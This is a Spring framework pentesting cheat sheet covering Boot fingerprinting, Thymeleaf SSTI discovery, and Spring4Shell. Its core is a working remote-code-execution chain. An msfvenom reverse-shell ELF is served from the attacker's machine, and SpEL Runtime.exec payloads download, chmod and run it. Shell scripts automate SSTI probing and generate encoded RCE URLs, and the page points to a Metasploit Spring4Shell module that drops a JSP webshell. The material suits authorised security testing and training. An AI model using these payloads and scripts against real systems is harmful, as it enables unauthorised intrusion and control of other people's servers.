Spring Pentesting
Last modified: 2023-09-15
Spring is an application framework and inversion of control container for the Java platform.
Framework Detection
Requesting a path that does not exist and getting the "Whitelabel Error Page" ("This application has no explicit mapping for /error, so you are seeing this as a fallback") is a strong sign of Spring Boot. The HTML page is only served to clients that accept text/html; curl and other API clients get a JSON error body with timestamp, status, error and path fields instead, so check for both shapes.
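A small fingerprinting script for the check above, added here as an example (it is not from the original page). It classifies an error body as the Whitelabel HTML page, the Spring Boot JSON error shape, or neither, and the live probe fetches a made-up path with both Accept headers. The sample bodies at the bottom are constructed for an offline check of the classifier.

```shell
#!/bin/sh
# Spring Boot fingerprint helper. Added example, not code from the page.
# Spring Boot's default error handling answers a request for an unmapped path
# in two shapes, depending on the Accept header:
#   - clients accepting text/html get the "Whitelabel Error Page"
#   - other clients get JSON like
#     {"timestamp":"...","status":404,"error":"Not Found","path":"/..."}
# A plain curl without an Accept header gets the JSON form, so grepping only
# for the Whitelabel string misses targets.

# classify_error_body BODY -> prints "whitelabel", "json-error" or "none"
classify_error_body() {
  body="$1"
  if printf '%s' "$body" | grep -q 'Whitelabel Error Page'; then
    echo whitelabel
  elif printf '%s' "$body" | grep -Eq '"status" *: *[0-9]+' \
    && printf '%s' "$body" | grep -Eq '"error" *:' \
    && printf '%s' "$body" | grep -Eq '"path" *:'; then
    echo json-error
  else
    echo none
  fi
}

# probe_spring_boot URL -> request a path that should not exist, once as a
# browser and once as an API client, and classify both answers.
# Needs network access; the URL is supplied by the caller.
probe_spring_boot() {
  base="${1%/}"
  path="/this-path-should-not-exist-$$"
  html=$(curl -s -H 'Accept: text/html' "$base$path")
  json=$(curl -s -H 'Accept: application/json' "$base$path")
  echo "text/html        : $(classify_error_body "$html")"
  echo "application/json : $(classify_error_body "$json")"
}

# Constructed sample bodies (not captured from a real host) for an offline
# check of the classifier.
SAMPLE_WHITELABEL='<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p></body></html>'
SAMPLE_JSON='{"timestamp":"2023-09-15T10:00:00.000+00:00","status":404,"error":"Not Found","path":"/nope"}'
SAMPLE_OTHER='<html><body><h1>404 Not Found</h1><hr><center>nginx</center></body></html>'

# Usage: sh fingerprint.sh https://example.com
if [ $# -gt 0 ]; then
  probe_spring_boot "$1"
fi
```

Run it against the base URL; a Spring Boot target typically reports whitelabel for the HTML request and json-error for the JSON one, while a reverse proxy's own 404 page reports none for both.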
Enumeration
Directory Discovery
ffuf -u https://example.com/FUZZ -w seclists/Discovery/Web-Content/spring-boot.txt
SSTI
Discovery
If user input, such as a search form field or a URL parameter, is reflected in the rendered page, the application may be vulnerable to server-side template injection (SSTI) in its Thymeleaf templates.
Try one probe for each Thymeleaf expression type (${...} variable, *{...} selection, #{...} message):
${2*2}
#{2*2}
*{2*2}
If the page shows 4 instead of the literal expression, the input was evaluated by the template engine. A single digit can appear on a page by chance, so confirm with a string method call:
${"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}
The expected output when the expression is evaluated is xfx; if the raw expression comes back unchanged, the input is reflected but not evaluated.
Reverse Shell
First, generate a reverse-shell ELF that the target will download from our machine:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf
Start a local web server so the target can download the payload file r.elf:
python3 -m http.server 8000
In another terminal, start a listener for the reverse shell:
nc -lvnp <local-port>
In the vulnerable input on the target site, inject the following three expressions one after another. Runtime.exec(String) splits the command on whitespace and does not go through a shell, so pipes, redirects and quoting are unavailable; that is why the binary is downloaded, made executable and run in separate requests. Check that wget exists on the target first (substitute curl -o if it does not).
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}
The listener should then receive the shell.
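The discovery probes and the Runtime.exec payloads above, collected into a script. This is an added example, not code from the original page; it assumes the injectable input is a GET query parameter, and the URL and parameter name are placeholders supplied by the caller. It also handles one practical detail the page does not show: when a probe is pasted into a URL by hand it must be percent-encoded, because "#" starts a URL fragment and never reaches the server.

```shell
#!/bin/sh
# Thymeleaf/SpEL SSTI helpers. Added example, not code from the original page.
# Assumptions: the injectable input is a GET query parameter; URL and parameter
# name are placeholders passed by the caller. Payloads are ASCII only.

# urlencode STRING -> percent-encode everything except unreserved characters.
# Needed when pasting a probe into a URL by hand: "#" would start a fragment
# and be dropped by the client, and "{", "}" and "*" are not query-safe.
urlencode() {
  s="$1"; out=""
  while [ -n "$s" ]; do
    c="${s%"${s#?}"}"      # first character
    s="${s#?}"             # remainder
    case "$c" in
      [A-Za-z0-9.~_-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s' "$out"
}

# ssti_probes -> "<payload> <expected-output>" per line, one probe for each
# Thymeleaf expression type: ${...} variable, *{...} selection, #{...} message.
# "4" can appear on a page by chance, so trust the string-method probes; the
# arithmetic ones are only a cheap first check.
ssti_probes() {
  printf '%s %s\n' '${2*2}' 4
  printf '%s %s\n' '*{2*2}' 4
  printf '%s %s\n' '#{2*2}' 4
  printf '%s %s\n' '${"dfd".replace("d","x")}' xfx
  printf '%s %s\n' '*{"dfd".replace("d","x")}' xfx
  printf '%s %s\n' '#{"dfd".replace("d","x")}' xfx
}

# ssti_evaluated PAYLOAD EXPECTED BODY -> exit 0 when the response contains the
# evaluated result and no longer contains the literal payload.
ssti_evaluated() {
  printf '%s' "$3" | grep -qF -- "$2" || return 1
  printf '%s' "$3" | grep -qF -- "$1" && return 1
  return 0
}

# probe_param URL PARAM -> send each probe and report which ones evaluated.
# curl's --data-urlencode together with -G does the query-string encoding.
probe_param() {
  ssti_probes | while read -r payload expected; do
    body=$(curl -s -G "$1" --data-urlencode "$2=$payload")
    if ssti_evaluated "$payload" "$expected" "$body"; then
      printf 'EVALUATED  %s -> %s\n' "$payload" "$expected"
    else
      printf 'reflected  %s\n' "$payload"
    fi
  done
}

# spel_exec CMD -> the *{...} payload used on this page: reach Runtime via
# Class.forName and call exec(). Runtime.exec(String) splits on whitespace and
# does not invoke a shell, so pipes, redirects and quoting do not work; hence
# the page fetches an ELF and runs it in separate steps.
spel_exec() {
  printf '*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("%s")}' "$1"
}

# stager_payloads LHOST LPORT -> the three-step download / chmod / run
# sequence from the page (chmod +x is all the binary needs).
stager_payloads() {
  spel_exec "wget http://$1:$2/r.elf"; echo
  spel_exec "chmod +x ./r.elf"; echo
  spel_exec "./r.elf"; echo
}

# rce_url URL PARAM CMD -> a ready-to-paste GET URL with the payload encoded.
rce_url() {
  printf '%s?%s=%s\n' "$1" "$2" "$(urlencode "$(spel_exec "$3")")"
}

# Usage: sh ssti.sh https://target.example/search q
if [ $# -ge 2 ]; then
  probe_param "$1" "$2"
fi
```

Run probe_param first; only a line marked EVALUATED for the string-method probe justifies moving on to stager_payloads, and rce_url gives you the encoded URL for each step when the parameter is in the query string rather than a form body.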
Spring4Shell (CVE-2022-22965)
Spring4Shell is a remote code execution vulnerability in Spring Framework's data binding (spring-beans, part of Spring Core), which is the heart of the framework.
It is a bypass of the patch for CVE-2010-1622: on JDK 9 and later, Class.getModule() opens a new path from class.module.classLoader to the Tomcat class loader that the original fix did not block. Affected versions are 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 (fixed in 5.3.18 and 5.2.20); older, unsupported lines are affected too. The public exploit additionally needs a WAR deployment on Tomcat; a Spring Boot executable jar with embedded Tomcat is not exploitable by that path, although the underlying bug is more general.
Exploitation
Metasploit has a module for it; set RHOSTS, TARGETURI and the payload's LHOST as usual before running:
msfconsole
msf> use exploit/multi/http/spring_framework_rce_spring4shell
Alternatively, various PoCs are available on GitHub. Most of them, like the Metasploit module, abuse the data binder to rewrite Tomcat's AccessLogValve properties so that the access log is written as a JSP webshell under the webapp directory; note the dropped file and the altered valve settings for cleanup, and expect the file on disk as a forensic artifact.